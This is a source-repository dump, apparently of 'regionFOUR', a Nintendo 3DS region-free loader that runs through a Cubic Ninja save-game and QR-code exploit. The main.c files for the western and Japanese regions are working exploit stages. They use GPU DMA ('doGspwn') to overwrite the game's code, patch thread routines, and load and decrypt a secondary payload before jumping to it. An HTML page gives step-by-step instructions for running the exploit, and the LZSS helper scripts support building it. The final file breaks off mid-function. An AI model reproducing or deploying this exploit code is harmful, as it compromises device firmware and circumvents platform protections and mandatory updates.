| if padding: 242 | out.write(b'\xff' * padding) 243 | 244 | def dump_compress_nlz11(input, out): 245 | # body 246 | length = 0 247 | def dump(): 248 | for t in _compress(input, windowclass=NLZ11Window): 249 | if type(t) == tuple: 250 | yield t 251 | from pprint import pprint 252 | pprint(list(dump())) 253 | 254 | # if __name__ == '__main__': 255 | # from sys import stdout, argv 256 | # data = open(argv[1], "rb").read() 257 | # stdout = stdout.detach() 258 | # #compress(data, stdout) 259 | # compress_nlz11(data, stdout) 260 | 261 | # #dump_compress_nlz11(data, stdout) 262 | -------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/cn_initial/source/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "text.h" 9 | 10 | #include "../../../../build/constants.h" 11 | 12 | int _strlen(char* str) 13 | { 14 | int l=0; 15 | while(*(str++))l++; 16 | return l; 17 | } 18 | 19 | void _strcpy(char* 
dst, char* src) 20 | { 21 | while(*src)*(dst++)=*(src++); 22 | *dst=0x00; 23 | } 24 | 25 | Result _srv_getServiceHandle(Handle* handleptr, Handle* out, char* server) 26 | { 27 | u8 l=_strlen(server); 28 | if(!out || !server || l>8)return -1; 29 | 30 | u32* cmdbuf=getThreadCommandBuffer(); 31 | 32 | cmdbuf[0]=0x50100; //request header code 33 | _strcpy((char*)&cmdbuf[1], server); 34 | cmdbuf[3]=l; 35 | cmdbuf[4]=0x0; 36 | 37 | Result ret=0; 38 | if((ret=svc_sendSyncRequest(*handleptr)))return ret; 39 | 40 | *out=cmdbuf[3]; 41 | 42 | return cmdbuf[1]; 43 | } 44 | 45 | // const u8 hexTable[]= 46 | // { 47 | // '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' 48 | // }; 49 | 50 | // void hex2str(char* out, u32 val) 51 | // { 52 | // int i; 53 | // for(i=0;i<8;i++){out[7-i]=hexTable[val&0xf];val>>=4;} 54 | // out[8]=0x00; 55 | // } 56 | 57 | // void drawHex(u32 val, int x, int y) 58 | // { 59 | // char str[9]; 60 | 61 | // hex2str(str,val); 62 | // drawString(CN_TOPFBADR1,str,x,y); 63 | // drawString(CN_TOPFBADR2,str,x,y); 64 | // } 65 | 66 | void doGspwn(u32* src, u32* dst, u32 size) 67 | { 68 | Result (*nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue)(u32** sharedGspCmdBuf, u32* cmdAdr)=(void*)0x001C2B54; 69 | u32 gxCommand[]= 70 | { 71 | 0x00000004, //command header (SetTextureCopy) 72 | (u32)src, //source address 73 | (u32)dst, //destination address 74 | size, //size 75 | 0xFFFFFFFF, // dim in 76 | 0xFFFFFFFF, // dim out 77 | 0x00000008, // flags 78 | 0x00000000, //unused 79 | }; 80 | 81 | u32** sharedGspCmdBuf=(u32**)(0x356208+0x58); 82 | nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue(sharedGspCmdBuf, gxCommand); 83 | } 84 | 85 | Result _GSPGPU_InvalidateDataCache(Handle* handle, Handle kprocess, u32* addr, u32 size) 86 | { 87 | u32* cmdbuf=getThreadCommandBuffer(); 88 | 89 | cmdbuf[0]=0x00090082; 90 | cmdbuf[1]=(u32)addr; 91 | cmdbuf[2]=size; 92 | cmdbuf[3]=0x00000000; 93 | cmdbuf[4]=(u32)kprocess; 94 | 95 | Result ret=0; 96 | 
if((ret=svc_sendSyncRequest(*handle)))return ret; 97 | 98 | return cmdbuf[1]; 99 | } 100 | 101 | void patchMem(Handle* gspHandle, u32 dst, u32 size, u32 start, u32 end) 102 | { 103 | Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; 104 | 105 | int i; 106 | _GSPGPU_InvalidateDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200); 107 | doGspwn((u32*)(dst), (u32*)(0x14100000), 0x200); 108 | svc_sleepThread(0x100000); 109 | for(i=start;i>32); 160 | cmdbuf[3]=size; 161 | cmdbuf[4]=(size<<4)|12; 162 | cmdbuf[5]=(u32)buffer; 163 | 164 | Result ret=0; 165 | if((ret=svc_sendSyncRequest(handle)))return ret; 166 | 167 | if(bytesRead)*bytesRead=cmdbuf[2]; 168 | 169 | return cmdbuf[1]; 170 | } 171 | 172 | u32 computeCodeAddress(u32 offset) 173 | { 174 | return CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+FIRM_APPMEMALLOC+offset; 175 | } 176 | 177 | int _main() 178 | { 179 | Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR; 180 | Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; 181 | 182 | // drawString(CN_TOPFBADR1,"ninjhaxx",0,0); 183 | // drawString(CN_TOPFBADR2,"ninjhaxx",0,0); 184 | 185 | Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR; 186 | 187 | int line=10; 188 | Result ret; 189 | 190 | Handle* addressArbiterHandle=(Handle*)0x334960; 191 | 192 | Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368; 193 | Handle** dspHandle=(Handle**)0x334EFC; 194 | 195 | _DSP_UnloadComponent(*dspHandle); 196 | 197 | //close threads 198 | //patch gsp event handler addr to kill gsp thread ASAP 199 | *((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr 200 | 201 | //patch waitSyncN 202 | patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F); 203 | patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13); 204 | patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E); 205 | // patchMem(gspHandle, 
computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52); 206 | 207 | //patch arbitrateAddress 208 | patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40); 209 | 210 | //wake threads 211 | svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0); 212 | svc_signalEvent(((Handle*)0x3480d0)[2]); 213 | s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1); 214 | 215 | //kill thread5 without panicking the kernel... 216 | *(u8*)0x359935=0x00; 217 | 218 | svc_sleepThread(0x10000000); 219 | 220 | //load secondary payload 221 | u32 secondaryPayloadSize; 222 | { 223 | Result ret; 224 | Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR; 225 | FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}}; 226 | 227 | //write secondary payload file 228 | Handle fileHandle; 229 | ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE); 230 | if(ret)*(u32*)NULL=0xC0DF0002; 231 | ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14100000, 0x00011000); 232 | if(ret)*(u32*)NULL=0xC0DF0003; 233 | ret=_FSFILE_Close(fileHandle); 234 | if(ret)*(u32*)NULL=0xC0DF0004; 235 | } 236 | 237 | //decrypt it 238 | { 239 | Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A44BC; 240 | Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A4B04; 241 | 242 | blowfishKeyScheduler((u32*)0x14200000); 243 | blowfishDecrypt((u32*)0x14200000, (u32*)0x14100000, (u32*)0x14100000, secondaryPayloadSize); 244 | } 245 | 246 | ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000); 247 | 248 | doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000); 249 | 250 | svc_sleepThread(0x3B9ACA00); 251 | 252 | // //close thread handles 253 | // ret=svc_closeHandle(*((Handle*)0x359938)); 254 | // ret=svc_closeHandle(*((Handle*)0x34FEA4)); 255 | // 
ret=svc_closeHandle(*((Handle*)0x356274)); 256 | // ret=svc_closeHandle(*((Handle*)0x334730)); 257 | // ret=svc_closeHandle(*((Handle*)0x334F64)); 258 | 259 | void (*reset)(int size)=(void*)CN_3DSX_LOADADR; 260 | reset(0); 261 | 262 | while(1); 263 | return 0; 264 | } 265 | -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/cn_initial/source/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "text.h" 9 | 10 | #include "../../../../build/constants.h" 11 | 12 | int _strlen(char* str) 13 | { 14 | int l=0; 15 | while(*(str++))l++; 16 | return l; 17 | } 18 | 19 | void _strcpy(char* dst, char* src) 20 | { 21 | while(*src)*(dst++)=*(src++); 22 | *dst=0x00; 23 | } 24 | 25 | Result _srv_getServiceHandle(Handle* handleptr, Handle* out, char* server) 26 | { 27 | u8 l=_strlen(server); 28 | if(!out || !server || l>8)return -1; 29 | 30 | u32* cmdbuf=getThreadCommandBuffer(); 31 | 32 | cmdbuf[0]=0x50100; //request header code 33 | _strcpy((char*)&cmdbuf[1], server); 34 | cmdbuf[3]=l; 35 | cmdbuf[4]=0x0; 36 | 37 | Result ret=0; 38 | if((ret=svc_sendSyncRequest(*handleptr)))return ret; 39 | 40 | *out=cmdbuf[3]; 41 | 42 | return cmdbuf[1]; 43 | } 44 | 45 | // const u8 hexTable[]= 46 | // { 47 | // '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' 48 | // }; 49 | 50 | // void hex2str(char* out, u32 val) 51 | // { 52 | // int i; 53 | // for(i=0;i<8;i++){out[7-i]=hexTable[val&0xf];val>>=4;} 54 | // out[8]=0x00; 55 | // } 56 | 57 | // void drawHex(u32 val, int x, int y) 58 | // { 59 | // char str[9]; 60 | 61 | // hex2str(str,val); 62 | // drawString((u8*)CN_CN_TOPFBADR1,str,x,y); 63 | // drawString((u8*)CN_CN_TOPFBADR2,str,x,y); 64 | // _GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, CN_TOPFBADR1, 0x46500*2); 65 | // } 66 | 67 | void doGspwn(u32* src, u32* dst, 
u32 size) 68 | { 69 | Result (*nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue)(u32** sharedGspCmdBuf, u32* cmdAdr)=(void*)CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue; 70 | u32 gxCommand[]= 71 | { 72 | 0x00000004, //command header (SetTextureCopy) 73 | (u32)src, //source address 74 | (u32)dst, //destination address 75 | size, //size 76 | 0xFFFFFFFF, // dim in 77 | 0xFFFFFFFF, // dim out 78 | 0x00000008, // flags 79 | 0x00000000, //unused 80 | }; 81 | 82 | u32** sharedGspCmdBuf=(u32**)(CN_GSPSHAREDBUF_ADR); 83 | nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue(sharedGspCmdBuf, gxCommand); 84 | } 85 | 86 | Result _GSPGPU_InvalidateDataCache(Handle* handle, Handle kprocess, u32* addr, u32 size) 87 | { 88 | u32* cmdbuf=getThreadCommandBuffer(); 89 | 90 | cmdbuf[0]=0x00090082; 91 | cmdbuf[1]=(u32)addr; 92 | cmdbuf[2]=size; 93 | cmdbuf[3]=0x00000000; 94 | cmdbuf[4]=(u32)kprocess; 95 | 96 | Result ret=0; 97 | if((ret=svc_sendSyncRequest(*handle)))return ret; 98 | 99 | return cmdbuf[1]; 100 | } 101 | 102 | void patchMem(Handle* gspHandle, u32 dst, u32 size, u32 start, u32 end) 103 | { 104 | Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; 105 | 106 | int i; 107 | _GSPGPU_InvalidateDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, size); 108 | doGspwn((u32*)(dst), (u32*)(0x14100000), size); 109 | svc_sleepThread(0x100000); 110 | for(i=start;i>32); 161 | cmdbuf[3]=size; 162 | cmdbuf[4]=(size<<4)|12; 163 | cmdbuf[5]=(u32)buffer; 164 | 165 | Result ret=0; 166 | if((ret=svc_sendSyncRequest(handle)))return ret; 167 | 168 | if(bytesRead)*bytesRead=cmdbuf[2]; 169 | 170 | return cmdbuf[1]; 171 | } 172 | 173 | u32 computeCodeAddress(u32 offset) 174 | { 175 | return CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+FIRM_APPMEMALLOC+offset; 176 | } 177 | 178 | void paintScreen(u8 r, u8 g, u8 b) 179 | { 180 | for(int i=0; i<0x46500;i+=3) 181 | { 182 | ((u8*)CN_TOPFBADR1)[i+0]=((u8*)CN_TOPFBADR2)[i+0]=r; 183 | 
((u8*)CN_TOPFBADR1)[i+1]=((u8*)CN_TOPFBADR2)[i+1]=g; 184 | ((u8*)CN_TOPFBADR1)[i+2]=((u8*)CN_TOPFBADR2)[i+2]=b; 185 | } 186 | } 187 | 188 | int _main() 189 | { 190 | Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR; 191 | Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; 192 | 193 | paintScreen(0x00,0x00,0x00); 194 | // drawString((u8*)CN_TOPFBADR1,"ninjhaxx",0,0); 195 | // drawString((u8*)CN_TOPFBADR2,"ninjhaxx",0,0); 196 | 197 | Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR; 198 | 199 | int line=10; 200 | Result ret; 201 | 202 | Handle* addressArbiterHandle=(Handle*)0x003414B0; 203 | 204 | Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78; 205 | Handle** dspHandle=(Handle**)0x341A4C; 206 | 207 | _DSP_UnloadComponent(*dspHandle); 208 | 209 | //close threads 210 | //patch gsp event handler addr to kill gsp thread ASAP 211 | *((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr 212 | 213 | //patch waitSyncN 214 | patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41); 215 | patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45); 216 | patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A); 217 | // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44); 218 | // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31); 219 | 220 | //patch arbitrateAddress 221 | patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C); 222 | 223 | //wake threads 224 | svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0); 225 | svc_signalEvent(((Handle*)0x354ba8)[2]); 226 | s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK ! 227 | 228 | //kill thread5 without panicking the kernel... 
229 | *(u8*)(0x3664D8+0xd)=0x00; 230 | 231 | //load secondary payload 232 | u32 secondaryPayloadSize; 233 | { 234 | Result ret; 235 | Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR; 236 | FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}}; 237 | 238 | //read secondary payload file 239 | Handle fileHandle; 240 | ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE); 241 | if(ret)*(u32*)NULL=0xC0DF0002; 242 | ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14100000, 0x00011000); 243 | if(ret)*(u32*)NULL=0xC0DF0003; 244 | ret=_FSFILE_Close(fileHandle); 245 | if(ret)*(u32*)NULL=0xC0DF0004; 246 | } 247 | 248 | //decrypt it 249 | { 250 | Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900; 251 | Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48; 252 | 253 | blowfishKeyScheduler((u32*)0x14200000); 254 | blowfishDecrypt((u32*)0x14200000, (u32*)0x14100000, (u32*)0x14100000, secondaryPayloadSize); 255 | } 256 | 257 | ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000); 258 | 259 | doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000); 260 | 261 | svc_sleepThread(0x3B9ACA00); 262 | 263 | void (*reset)(int size)=(void*)CN_3DSX_LOADADR; 264 | reset(0); 265 | 266 | while(1); 267 | return 0; 268 | } 269 | -------------------------------------------------------------------------------- /scripts/lzss3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | from sys import stdin, stdout, stderr, exit 5 | from os import SEEK_SET, SEEK_CUR, SEEK_END 6 | from errno import EPIPE 7 | from struct import pack, unpack 8 | 9 | __all__ = ('decompress', 'decompress_file', 'decompress_bytes', 10 | 'decompress_overlay', 'DecompressionError') 11 | 12 | class 
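DecompressionError(ValueError):
    pass


def bits(byte):
    """Return the eight bits of *byte* as a tuple, most significant bit first."""
    return tuple((byte >> shift) & 1 for shift in range(7, -1, -1))


def _byte_reader(indata):
    """Return a zero-argument function that yields successive items of indata.

    Running off the end of the input raises DecompressionError, so a
    truncated stream is reported as a decoding failure rather than as a bare
    StopIteration escaping from the decoder.
    """
    it = iter(indata)

    def readbyte():
        try:
            return next(it)
        except StopIteration:
            raise DecompressionError(
                "compressed data ends unexpectedly") from None

    return readbyte


def _copy_back(data, disp, count):
    """Append count bytes to data, each read from disp bytes before its end.

    The displacement comes straight from the compressed stream, so it is
    checked against the amount of output produced so far before it is used.
    """
    if disp > len(data):
        raise DecompressionError(
            "back-reference of %d bytes exceeds the %d bytes decompressed so far"
            % (disp, len(data)))
    # Byte-by-byte on purpose: when disp < count the copy overlaps the bytes
    # it has just written, which is how short runs get repeated.
    for _ in range(count):
        data.append(data[-disp])


def decompress_raw_lzss10(indata, decompressed_size, _overlay=False):
    """Decompress LZSS-compressed bytes. Returns a bytearray.

    indata is an iterable of byte values and decompressed_size is the number
    of output bytes expected. Each flag byte describes the next eight tokens,
    most significant bit first: 0 is a literal byte, 1 is a big-endian 16-bit
    back-reference whose top 4 bits are (count - 3) and whose low 12 bits are
    the displacement, biased by 1 (or by 3 when _overlay is true).

    Raises DecompressionError if the input is truncated, if a back-reference
    points before the start of the output, or if the final length differs
    from decompressed_size.
    """
    data = bytearray()
    readbyte = _byte_reader(indata)
    disp_extra = 3 if _overlay else 1

    while len(data) < decompressed_size:
        for flag in bits(readbyte()):
            if flag == 0:
                data.append(readbyte())
            else:
                # big-endian
                hi = readbyte()
                lo = readbyte()
                sh = (hi << 8) | lo
                count = (sh >> 0xc) + 3
                disp = (sh & 0xfff) + disp_extra
                _copy_back(data, disp, count)

            if decompressed_size <= len(data):
                break

    # A back-reference may run past decompressed_size; that is rejected here.
    if len(data) != decompressed_size:
        raise DecompressionError("decompressed size does not match the expected size")

    return data


def decompress_raw_lzss11(indata, decompressed_size):
    """Decompress LZSS-compressed bytes. Returns a bytearray.

    Same token layout as decompress_raw_lzss10, except that a back-reference
    is 2, 3 or 4 bytes long depending on the top nibble of its first byte
    (the "indicator"); the displacement is always 12 bits, biased by 1.

    Raises DecompressionError if the input is truncated, if a back-reference
    points before the start of the output, or if the final length differs
    from decompressed_size.
    """
    # NOTE(review): one 4-byte back-reference can expand to 0x10110 bytes, so
    # output size is bounded only by decompressed_size. Callers that take
    # that value from an untrusted file header should cap it.
    data = bytearray()
    readbyte = _byte_reader(indata)

    while len(data) < decompressed_size:
        for flag in bits(readbyte()):
            if flag == 0:
                data.append(readbyte())
            else:
                b = readbyte()
                indicator = b >> 4

                if indicator == 0:
                    # 8 bit count, 12 bit disp
                    # indicator is 0, don't need to mask b
                    count = b << 4
                    b = readbyte()
                    count += (b >> 4) + 0x11
                elif indicator == 1:
                    # 16 bit count, 12 bit disp
                    count = ((b & 0xf) << 12) + (readbyte() << 4)
                    b = readbyte()
                    count += (b >> 4) + 0x111
                else:
                    # indicator is count (4 bits), 12 bit disp
                    count = indicator + 1

                disp = ((b & 0xf) << 8) + readbyte() + 1
                _copy_back(data, disp, count)

            if decompressed_size <= len(data):
                break

    # A back-reference may run past decompressed_size; that is rejected here.
    if len(data) != decompressed_size:
        raise DecompressionError("decompressed size does not match the expected size")

    return data


def decompress_overlay(f, out):
    # the compression header is at the end of the file
    f.seek(-8, SEEK_END)
    header = f.read(8)

    # decompression goes backwards.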
139 | # end < here < start 140 | 141 | # end_delta == here - decompression end address 142 | # start_delta == decompression start address - here 143 | end_delta, start_delta = unpack("> 0x18 148 | end_delta &= 0xFFFFFF 149 | decompressed_size = start_delta + end_delta 150 | 151 | f.seek(-end_delta, SEEK_END) 152 | 153 | data = bytearray() 154 | data.extend(f.read(end_delta - padding)) 155 | data.reverse() 156 | 157 | #stdout.write(data.tostring()) 158 | 159 | uncompressed_data = decompress_raw_lzss10(data, decompressed_size, 160 | _overlay=True) 161 | uncompressed_data.reverse() 162 | 163 | # first we write up to the portion of the file which was "overwritten" by 164 | # the decompressed data, then the decompressed data itself. 165 | # i wonder if it's possible for decompression to overtake the compressed 166 | # data, so that the decompression code is reading its own output... 167 | f.seek(0, SEEK_SET) 168 | out.write(f.read(filelen - end_delta)) 169 | out.write(uncompressed_data) 170 | 171 | def decompress(obj): 172 | """Decompress LZSS-compressed bytes or a file-like object. 173 | 174 | Shells out to decompress_file() or decompress_bytes() depending on 175 | whether or not the passed-in object has a 'read' attribute or not. 176 | 177 | Returns a bytearray.""" 178 | if hasattr(obj, 'read'): 179 | return decompress_file(obj) 180 | else: 181 | return decompress_bytes(obj) 182 | 183 | def decompress_bytes(data): 184 | """Decompress LZSS-compressed bytes. Returns a bytearray.""" 185 | header = data[:4] 186 | if header[0] == 0x10: 187 | decompress_raw = decompress_raw_lzss10 188 | elif header[0] == 0x11: 189 | decompress_raw = decompress_raw_lzss11 190 | else: 191 | raise DecompressionError("not as lzss-compressed file") 192 | 193 | decompressed_size, = unpack(" 2 | 3 | 4 | 5 | regionFOUR - 3DS region free loader 6 | 7 | 8 | 9 | 10 | 11 | 40 | 41 | 50 | 51 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 200 | 201 |

    > What is regionFOUR ?

    206 |

    207 | regionFOUR is a region free loader for New3DS/New3DSXL/3DS/3DSXL/2DS which currently works on firmware versions 9.0 through 9.8 (including 9.1, 9.2, 9.3, 9.4, 9.5, 9.6 and 9.7). It also allows you to bypass mandatory gamecard firmware updates. It currently requires that you own a copy of Cubic Ninja from your region in order to run. To see it in action, look no further. 208 |

    209 | 210 |

    > How do I run regionFOUR ?

    211 |

    212 |

    213 | 1. Go to the get regionFOUR section of this page and enter your console's firmware version.
    214 | 2. Hit submit; you should get your very own regionFOUR QR code.
    215 | 4. Make sure your 3DS's wifi connection is enabled and connected to the internet (this is important!).
    216 | 5. Start CUBIC NINJA on your console, choose "Create", then "QR code", and finally "Scan QR code".
    217 | 6. Scan the QR Code. This step might take a couple of tries; make sure the QR code fills as much of your 3DS's screen as possible. If scanning the QR code returns to the menu with an error, try a few more times.
    218 | 7. Follow the on screen instructions. You may choose not to install the exploit to your gamecard's savedata, though doing so is not recommended.
    219 | 8. Once regionFOUR is ready, you will be prompted to insert your out-of-region gamecard. Simply remove the Cubic Ninja gamecard, insert your gamecard and press START.
    220 | 9. OPTIONAL - once regionFOUR is installed to your gamecard, just go back to the "QR code" menu and it'll run automatically!
    221 |

    222 |

    223 | 224 |

    > Get regionFOUR

    225 |

    226 | Select your console's firmware version (only select NEW if you are running this on a New 3DS (XL)) :
    227 |

    236 |

    237 | 238 |

    > Frequently Asked Questions

    239 |

    240 | For more information on regionFOUR and its source code, please visit its GitHub page. 241 |

247 | 248 | 251 | 252 | 253 | 254 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/cn_initial/source/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "text.h" 8 | 9 | #include "../../../../build/constants.h" 10 | 11 | #define TOPFBADR1 ((u8*)CN_TOPFBADR1) 12 | #define TOPFBADR2 ((u8*)CN_TOPFBADR2) 13 | 14 | int _strlen(char* str) 15 | { 16 | int l=0; 17 | while(*(str++))l++; 18 | return l; 19 | } 20 | 21 | void _strcpy(char* dst, char* src) 22 | { 23 | while(*src)*(dst++)=*(src++); 24 | *dst=0x00; 25 | } 26 | 27 | //? 28 | Result HTTPC_Initialize(Handle handle) 29 | { 30 | u32* cmdbuf=getThreadCommandBuffer(); 31 | 32 | cmdbuf[0]=0x10044; //request header code 33 | cmdbuf[1]=0x1000; //unk 34 | cmdbuf[2]=0x20; //unk 35 | 36 | Result ret=0; 37 | if((ret=svc_sendSyncRequest(handle)))return ret; 38 | 39 | return cmdbuf[1]; 40 | } 41 | 42 | Result HTTPC_CreateContext(Handle handle, char* url, Handle* contextHandle) 43 | { 44 | u32* cmdbuf=getThreadCommandBuffer(); 45 | u32 l=_strlen(url)+1; 46 | 47 | cmdbuf[0]=0x20082; //request header code 48 | cmdbuf[1]=l; 49 | cmdbuf[2]=0x01; //unk 50 | cmdbuf[3]=(l<<4)|0xA; 51 | cmdbuf[4]=(u32)url; 52 | 53 | Result ret=0; 54 | if((ret=svc_sendSyncRequest(handle)))return ret; 55 | 56 | if(contextHandle)*contextHandle=cmdbuf[2]; 57 | 58 | return cmdbuf[1]; 59 | } 60 | 61 | Result HTTPC_InitializeConnectionSession(Handle handle, Handle contextHandle) 62 | { 63 | u32* cmdbuf=getThreadCommandBuffer(); 64 | 65 | cmdbuf[0]=0x80042; //request header code 66 | cmdbuf[1]=contextHandle; 67 | cmdbuf[2]=0x20; //unk, fixed to that in code 68 | 69 | Result ret=0; 70 | if((ret=svc_sendSyncRequest(handle)))return ret; 71 | 72 | return cmdbuf[1]; 73 | } 74 | 75 | Result HTTPC_SetProxyDefault(Handle handle, Handle contextHandle) 76 | { 77 | u32* 
cmdbuf=getThreadCommandBuffer(); 78 | 79 | cmdbuf[0]=0xe0040; //request header code 80 | cmdbuf[1]=contextHandle; 81 | 82 | Result ret=0; 83 | if((ret=svc_sendSyncRequest(handle)))return ret; 84 | 85 | return cmdbuf[1]; 86 | } 87 | 88 | Result HTTPC_CloseContext(Handle handle, Handle contextHandle) 89 | { 90 | u32* cmdbuf=getThreadCommandBuffer(); 91 | 92 | cmdbuf[0]=0x30040; //request header code 93 | cmdbuf[1]=contextHandle; 94 | 95 | Result ret=0; 96 | if((ret=svc_sendSyncRequest(handle)))return ret; 97 | 98 | return cmdbuf[1]; 99 | } 100 | 101 | Result HTTPC_BeginRequest(Handle handle, Handle contextHandle) 102 | { 103 | u32* cmdbuf=getThreadCommandBuffer(); 104 | 105 | cmdbuf[0]=0x90040; //request header code 106 | cmdbuf[1]=contextHandle; 107 | 108 | Result ret=0; 109 | if((ret=svc_sendSyncRequest(handle)))return ret; 110 | 111 | return cmdbuf[1]; 112 | } 113 | 114 | Result HTTPC_ReceiveData(Handle handle, Handle contextHandle, u8* buffer, u32 size) 115 | { 116 | u32* cmdbuf=getThreadCommandBuffer(); 117 | 118 | cmdbuf[0]=0xB0082; //request header code 119 | cmdbuf[1]=contextHandle; 120 | cmdbuf[2]=size; 121 | cmdbuf[3]=(size<<4)|12; 122 | cmdbuf[4]=(u32)buffer; 123 | 124 | Result ret=0; 125 | if((ret=svc_sendSyncRequest(handle)))return ret; 126 | 127 | return cmdbuf[1]; 128 | } 129 | 130 | Result HTTPC_GetDownloadSizeState(Handle handle, Handle contextHandle, u32* totalSize) 131 | { 132 | u32* cmdbuf=getThreadCommandBuffer(); 133 | 134 | cmdbuf[0]=0x00060040; //request header code 135 | cmdbuf[1]=contextHandle; 136 | 137 | Result ret=0; 138 | if((ret=svc_sendSyncRequest(handle)))return ret; 139 | 140 | if(totalSize)*totalSize=cmdbuf[3]; 141 | 142 | return cmdbuf[1]; 143 | } 144 | 145 | Result _srv_getServiceHandle(Handle* handleptr, Handle* out, char* server) 146 | { 147 | u8 l=_strlen(server); 148 | if(!out || !server || l>8)return -1; 149 | 150 | u32* cmdbuf=getThreadCommandBuffer(); 151 | 152 | cmdbuf[0]=0x50100; //request header code 153 | 
_strcpy((char*)&cmdbuf[1], server); 154 | cmdbuf[3]=l; 155 | cmdbuf[4]=0x0; 156 | 157 | Result ret=0; 158 | if((ret=svc_sendSyncRequest(*handleptr)))return ret; 159 | 160 | *out=cmdbuf[3]; 161 | 162 | return cmdbuf[1]; 163 | } 164 | 165 | // const u8 hexTable[]= 166 | // { 167 | // '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' 168 | // }; 169 | 170 | // void hex2str(char* out, u32 val) 171 | // { 172 | // int i; 173 | // for(i=0;i<8;i++){out[7-i]=hexTable[val&0xf];val>>=4;} 174 | // out[8]=0x00; 175 | // } 176 | 177 | // void drawHex(u32 val, int x, int y) 178 | // { 179 | // char str[9]; 180 | 181 | // hex2str(str,val); 182 | // drawString(TOPFBADR1,str,x,y); 183 | // drawString(TOPFBADR2,str,x,y); 184 | // } 185 | 186 | void doGspwn(u32* src, u32* dst, u32 size) 187 | { 188 | Result (*nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue)(u32** sharedGspCmdBuf, u32* 